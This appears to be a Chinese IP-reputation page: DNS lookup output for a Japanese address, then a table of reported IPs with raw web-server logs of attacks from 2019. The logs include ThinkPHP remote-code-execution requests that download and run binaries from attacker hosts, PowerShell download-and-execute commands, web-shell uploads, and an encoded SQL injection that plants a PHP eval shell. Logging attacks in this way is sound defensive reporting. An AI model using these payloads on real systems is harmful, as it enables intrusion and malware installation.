城市(city): unknown
省份(region): unknown
国家(country): Japan
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 125.2.61.183
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36281
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;125.2.61.183. IN A
;; AUTHORITY SECTION:
. 29 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025021800 1800 900 604800 86400
;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Feb 18 21:34:08 CST 2025
;; MSG SIZE rcvd: 105183.61.2.125.in-addr.arpa is an alias for 183.0-255.61.2.125.in-addr.arpa.
183.0-255.61.2.125.in-addr.arpa domain name pointer user-183061002125.kinet-tv.ne.jp.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
183.61.2.125.in-addr.arpa canonical name = 183.0-255.61.2.125.in-addr.arpa.
183.0-255.61.2.125.in-addr.arpa name = user-183061002125.kinet-tv.ne.jp.
Authoritative answers can be found from:| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 193.201.224.220 | attack | wordpress 暴力破戒攻击 193.201.224.220 - - [31/Mar/2019:18:05:02 +0800] "POST /wp-login.php HTTP/1.1" 200 5002 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" |
2019-03-31 19:57:42 |
| 76.237.130.233 | attack | 76.237.130.233 - - [01/Apr/2019:19:03:08 +0800] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 76.237.130.233 - - [01/Apr/2019:19:03:09 +0800] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 76.237.130.233 - - [01/Apr/2019:19:03:10 +0800] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-01 19:53:21 |
| 118.25.71.65 | attack | 攻击型IP 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-03-31 20:42:33 |
| 118.25.49.95 | attack | 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 400 682 "http://118.25.52.138:443/struts2-rest-showcase/orders.xhtml" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.action HTTP/1.1" 400 682 "http://118.25.52.138:443/index.action" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.do HTTP/1.1" 400 682 "http://118.25.52.138:443/index.do" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-01 11:50:45 |
| 58.251.121.186 | attack | 58.251.121.186 - - [01/Apr/2019:09:55:29 +0800] "GET /spider.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:09:55:29 +0800] "GET /spider.php HTTP/1.1" 404 209 "http://118.25.52.138/spider.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 09:58:24 |
| 195.231.2.207 | attack | 195.231.2.207 - - [03/Apr/2019:11:56:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://195.231.2.207/ronin.thinkphp;cat%20ronin.thinkphp%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.11.1.el6.x86_64" 195.231.2.207 - - [03/Apr/2019:11:56:05 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://195.231.2.207/ronin.thinkphp;cat%20ronin.thinkphp%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.11.1.el6.x86_64" 195.231.2.207 - - [03/Apr/2019:11:56:05 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://195.231.2.207/ronin.thinkphp;cat%20ronin.thinkphp%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.11.1.el6.x86_64" 195.231.2.207 - - [03/Apr/2019:11:56:06 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://195.231.2.207/ronin.thinkphp;cat%20ronin.thinkphp%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.11.1.el6.x86_64" |
2019-04-03 11:56:47 |
| 104.192.74.213 | bots | 机器IP,headless chrome 104.192.74.213 - - [04/Apr/2019:16:40:03 +0800] "GET /index.php/2018/12/05/baidu_2018_12_05_en/?replytocom=237 HTTP/1.1" 200 19564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3538.110 Safari/537.36" 104.192.74.213 - - [04/Apr/2019:16:41:00 +0800] "GET /index.php/2019/04/04/palantir_2019_04_04_en/ HTTP/1.1" 200 10235 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3538.110 Safari/537.36" 104.192.74.213 - - [04/Apr/2019:16:41:46 +0800] "GET /index.php/2018/12/05/baidu_2018_12_05_en/?replytocom=6665 HTTP/1.1" 200 19563 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3538.110 Safari/537.36" |
2019-04-04 16:42:48 |
| 58.218.56.113 | attack | 58.218.56.113 - - [02/Apr/2019:07:40:20 +0800] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 58.218.56.113 - - [02/Apr/2019:07:40:20 +0800] "GET /web/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 404 505 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 58.218.56.113 - - [02/Apr/2019:07:40:21 +0800] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 58.218.56.113 - - [02/Apr/2019:07:40:21 +0800] "GET /web/editor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 404 502 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" |
2019-04-02 11:05:01 |
| 123.190.154.164 | attack | 123.190.154.164 - - [02/Apr/2019:09:32:58 +0800] "GET /otn/login/checkUser HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-02 09:44:02 |
| 118.25.145.186 | attack | 118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-08 16:47:25 |
| 59.111.29.6 | attack | 59.111.29.6 - - [04/Apr/2019:10:57:04 +0800] "\\x04\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" 400 182 "-" "-" 59.111.29.6 - - [04/Apr/2019:10:57:04 +0800] "\\x05\\x03\\x00\\x01\\x02" 400 182 "-" "-" 59.111.29.6 - - [04/Apr/2019:10:57:04 +0800] "GET http://baidu.com/ HTTP/1.1" 400 682 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" |
2019-04-04 10:59:18 |
| 122.114.158.230 | attack | 122.114.158.230 - - [04/Apr/2019:09:15:21 +0800] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 101457 "http://eznewstoday.com//index.php?m=member&c=index&a=register&siteid=1" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" |
2019-04-04 09:16:20 |
| 157.55.39.65 | bots | 157.55.39.37 - - [07/Apr/2019:09:58:35 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 157.55.39.65 - - [07/Apr/2019:09:58:49 +0800] "GET /sitemap.xml HTTP/1.1" 200 1897320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" |
2019-04-07 10:02:26 |
| 115.199.238.65 | spamattack | 115.199.238.65 - - [04/Apr/2019:03:57:15 +0800] "GET //plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 516 "http://www.mafengwo.cn/" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html\\xa3\\xa9" |
2019-04-04 06:44:48 |
| 59.36.119.226 | attack | 59.36.119.226 - - [06/Apr/2019:14:35:29 +0800] "GET /hm.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [06/Apr/2019:14:35:29 +0800] "GET /mysql/admin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [06/Apr/2019:14:35:29 +0800] "GET /program/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.226 - - [06/Apr/2019:14:35:29 +0800] "GET /hm.php HTTP/1.1" 404 209 "http://118.25.52.138/hm.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [06/Apr/2019:14:35:29 +0800] "GET /mysql/admin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/mysql/admin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 14:37:06 |